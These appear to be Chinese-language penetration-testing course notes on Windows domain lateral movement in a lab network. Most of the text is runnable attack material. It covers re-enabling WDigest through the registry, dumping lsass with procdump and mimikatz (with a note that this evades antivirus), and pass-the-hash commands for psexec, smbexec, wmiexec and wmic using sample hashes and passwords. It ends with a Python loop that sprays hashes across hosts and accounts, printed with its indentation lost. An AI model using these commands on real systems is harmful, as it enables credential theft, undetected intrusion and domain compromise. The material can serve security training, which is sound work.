内网安全3-域横向smb&wmi明文或hash传递

#知识点1：

Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码

Windows2012以下版本如安装KB2871997补丁，同样也会导致无法获取明文密码

针对以上情况，我们提供了4种方式解决此类问题

1.利用哈希hash传递(pth，ptk等)进行移动

2.利用其它服务协议(SMB,WMI等)进行哈希移动

3.利用注册表操作开启Wdigest Auth值进行获取

4.利用工具或第三方平台(Hachcat)进行破解获取

 

#知识点2：

Windows系统LM Hash及NTLM Hash加密算法，个人系统在Windows vista后，服务器系统在Windows 2003以后，认证方式均为NTLM Hash。

 

#注册表修改

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

 

hashcat -a 0 -m 1000 hash file --force //爆破哈希的软件

 

1-Procdump+Mimikatz配合获取 

procdump是微软开发的所以不会被杀，如果mimikatz被杀的情况下可以用这个配合导出密码

#procdump配合mimikatz

procdump -accepteula -ma lsass.exe lsass.dmp

mimikatz上执行：

sekurlsa::minidump lsass.dmp

sekurlsa::logonPasswords full

#Pwdump7

#QuarksPwdump

 

2-域横向移动SMB服务利用-psexec,smbexec(官方自带)

利用SMB服务可以通过明文或hash传递来远程执行，条件445服务端口开放。

#psexec第一种：先有ipc链接，psexec需要明文或hash传递

net use \\192.168.3.32\ipc$ "admin!@#45" /user:ad

ministrator

psexec \\192.168.3.32 -s cmd # 需要先有ipc链接 -s以System权限运行

#psexec第二种：不用建立IPC直接提供明文账户密码

psexec \\192.168.3.21 -u administrator -p Admin12345 -s cmd 

psexec -hashes :$HASH$ ./administrator@10.1.2.3

psexec -hashes :$HASH$ domain/administrator@10.1.2.3

psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 官方Pstools无法采用hash连接

#非官方自带-参考impacket工具包使用，操作简单，容易被杀

 

#smbexec无需先ipc链接 明文或hash传递

smbexec god/administrator:Admin12345@192.168.3.21

smbexec ./administrator:admin!@#45@192.168.3.32

smbexec -hashes :$HASH$ ./admin@192.168.3.21

smbbexec -hashes :$HASH$ domain/admin@192.168.3.21

smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

smbexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21

 

3-域横向移动WMI服务利用-cscript,wmiexec,wmic

WMI(Windows Management Instrumentation) 是通过135端口进行利用，支持用户名明文或者hash的方式进行认证，并且该方法不会在目标日志系统留下痕迹。

#自带WMIC 明文传递 无回显

wmic /node:192.168.3.21 /user:administrator /password:Admin12345 process call create "cmd.exe /c ipconfig >C:\1.txt"

#自带cscript明文传递 有回显

cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345

#套件impacket wmiexec 明文或hash传递 有回显exe版本

wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"

wmiexec god/administrator:Admin12345@192.168.3.21 "whoami"

wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 "whoami"

wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21 "whoami"

 

4-域横向移动以上服务hash批量利用-python编译exe

#pyinstaller.exe -F fuck_neiwang_002.py

import os,time

ips={

'192.168.3.21',

'192.168.3.25',

'192.168.3.29',

'192.168.3.30',

'192.168.3.32'

}

users={

'Administrator',

'boss',

'dbadmin',

'fileadmin',

'mack',

'mary',

'webadmin'

}

hashs={

'ccef208c6485269c20db2cad21734fe7',

'518b98ad4178a53695dc997aa02d455c'

}

 

for ip in ips:

for user in users:

for mimahash in hashs:

#wmiexec -hashes :hash god/user@ip whoami

exec = "wmiexec -hashes :"+mimahash+" god/"+user+"@"+ip+" whoami"

print('--->' + exec + '<---')

os.system(exec)

time.sleep(0.5)